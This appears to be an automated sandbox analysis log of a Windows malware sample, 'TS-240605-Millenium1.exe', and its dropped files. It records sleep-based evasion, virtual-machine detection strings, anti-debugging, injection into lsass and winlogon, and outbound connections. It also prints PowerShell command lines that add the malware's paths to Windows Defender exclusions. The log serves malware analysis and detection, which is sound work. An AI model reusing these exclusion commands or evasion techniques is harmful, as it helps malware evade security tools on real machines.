                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -600000s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -599844s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7912Thread sleep count: 3645 > 30
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -599558s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -599406s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -599275s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -599094s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -598950s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -598837s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -598656s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -598498s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -598370s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -598234s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -598103s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -597984s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -597874s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -597746s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -597629s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7912Thread sleep count: 1349 > 30
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -597468s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -597148s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -597031s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -596918s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -596783s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -596656s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -596505s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -596375s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -596249s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -596131s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -596011s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -595902s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -595781s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -595672s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -595562s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -595453s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7364Thread sleep time: -30000s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 3272Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\ProgramData\svchost.exe TID: 7928Thread sleep count: 47 > 30
                                  Source: C:\ProgramData\svchost.exe TID: 7928Thread sleep time: -47000s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep count: 6634 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep time: -6456360425798339s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep count: 504 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\ProgramData\svchost.exe TID: 8188Thread sleep time: -36000s >= -30000s
                                  Source: C:\Windows\System32\dialer.exe TID: 2032Thread sleep count: 38 > 30
                                  Source: C:\Windows\System32\winlogon.exe TID: 8176Thread sleep count: 2534 > 30
                                  Source: C:\Windows\System32\winlogon.exe TID: 8176Thread sleep time: -2534000s >= -30000s
                                  Source: C:\Windows\System32\winlogon.exe TID: 8176Thread sleep count: 7465 > 30
                                  Source: C:\Windows\System32\winlogon.exe TID: 8176Thread sleep time: -7465000s >= -30000s
                                  Source: C:\Windows\System32\lsass.exe TID: 5720Thread sleep count: 9928 > 30
                                  Source: C:\Windows\System32\lsass.exe TID: 5720Thread sleep time: -9928000s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2028Thread sleep count: 7225 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2028Thread sleep count: 2450 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1216Thread sleep time: -9223372036854770s >= -30000s
                                  Source: C:\Windows\System32\svchost.exe TID: 4108Thread sleep count: 7131 > 30
                                  Source: C:\Windows\System32\svchost.exe TID: 4108Thread sleep time: -7131000s >= -30000s
                                  Source: C:\ProgramData\main.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB38670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF6CEB38670
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB28D00 FindFirstFileExW,FindClose,0_2_00007FF6CEB28D00
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB38670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF6CEB38670
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB426C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6CEB426C4
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_0036C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,5_2_0036C4A8
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_0037E560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,5_2_0037E560
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF647787F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,6_2_00007FF647787F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF647787F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,6_2_00007FF647787F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF647791FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,6_2_00007FF647791FE4
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF647778B00 FindFirstFileExW,FindClose,6_2_00007FF647778B00
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00000235BB88DCE0 FindFirstFileExW,7_2_00000235BB88DCE0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD38670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,7_2_00007FF7DFD38670
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD28D00 FindFirstFileExW,FindClose,7_2_00007FF7DFD28D00
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD38670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,7_2_00007FF7DFD38670
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD426C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,7_2_00007FF7DFD426C4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB8874DCE0 FindFirstFileExW,8_2_000001EB8874DCE0
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_00380B80 VirtualQuery,GetSystemInfo,5_2_00380B80
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 922337203685477
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 600000
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599844
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599558
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599406
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599275
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599094
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598950
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598837
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598656
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598498
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598370
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598234
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598103
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597984
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597874
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597746
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597629
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597468
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597148
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597031
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596918
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596783
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596656
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596505
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596375
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596249
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596131
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596011
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595902
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595781
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595672
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595562
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595453
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code CacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\CacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\extJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefpJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\jsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\defJump to behavior
                                  Source: Build.exe, 00000005.00000002.1875260545.00000000095E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}M
                                  Source: main.exe, 00000015.00000002.1999999146.0000025EB809E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                                  Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
                                  Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
                                  Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
                                  Source: main.exe, 00000015.00000002.1999999146.0000025EB809E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                                  Source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpBinary or memory string: PreventStartOnVirtualMachine
                                  Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
                                  Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
                                  Source: based.exe, 00000008.00000002.2123124196.000001EB87080000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
                                  Source: Build.exe, 00000005.00000002.1872849445.0000000009453000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\N
                                  Source: main.exe, 00000015.00000002.1995297484.0000025EB6172000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
                                  Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                                  Source: based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwarec
                                  Source: based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicera
                                  Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
                                  Source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpBinary or memory string: VMwareVBox
                                  Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeAPI call chain: ExitProcess graph end nodegraph_5-26232
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

                                  Anti Debugging

                                  barindex
                                  Source: C:\ProgramData\svchost.exeThread information set: HideFromDebugger
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB2C8BC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6CEB2C8BC
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 2_2_00007FFDFB3C2F20 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FFDFB3C2F20
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_0038A640 mov eax, dword ptr fs:[00000030h]5_2_0038A640
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB442D0 GetProcessHeap,0_2_00007FF6CEB442D0
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\ProgramData\main.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB2C030 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6CEB2C030
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB2C8BC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6CEB2C8BC
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB3B3CC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6CEB3B3CC
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB2CA9C SetUnhandledExceptionFilter,0_2_00007FF6CEB2CA9C
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 2_2_00007FFE1A460AA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFE1A460AA8
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_0038215D SetUnhandledExceptionFilter,5_2_0038215D
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_003812D7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_003812D7
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_0038647F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0038647F
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_00381FCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00381FCA
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF64777C860 SetUnhandledExceptionFilter,6_2_00007FF64777C860
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF64777C67C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF64777C67C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF64777BDE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF64777BDE0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF64778ACD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF64778ACD8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00000235BB88D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00000235BB88D2A4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00000235BB887D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00000235BB887D90
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD2C8BC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF7DFD2C8BC
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD2C030 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF7DFD2C030
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD3B3CC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF7DFD3B3CC
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD2CA9C SetUnhandledExceptionFilter,7_2_00007FF7DFD2CA9C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB88747D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000001EB88747D90
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB8874D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000001EB8874D2A4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B3034 IsProcessorFeaturePresent,00007FFE1A461730,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE1A461730,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFDFB9B3034
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE00762126 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFE00762126
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE00761CB7 SetUnhandledExceptionFilter,8_2_00007FFE00761CB7
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFE007DCE3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FFE007DCE3C
                                  Source: C:\ProgramData\main.exeMemory allocated: page read and write | page guard

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Source: C:\ProgramData\svchost.exeNetwork Connect: 216.58.212.132 80
                                  Source: C:\ProgramData\svchost.exeNetwork Connect: 185.199.109.133 443
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'Jump to behavior
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 2BAAF1B0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1845B380000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and write
